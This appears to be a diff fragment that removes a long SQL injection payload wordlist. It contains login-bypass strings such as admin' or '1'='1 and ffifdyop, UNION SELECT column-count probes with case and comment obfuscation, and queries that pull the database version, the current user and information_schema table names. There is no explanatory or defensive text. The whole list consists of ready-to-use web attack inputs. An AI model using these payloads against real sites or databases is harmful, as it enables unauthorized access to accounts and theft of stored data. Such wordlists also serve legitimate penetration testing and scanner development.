"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
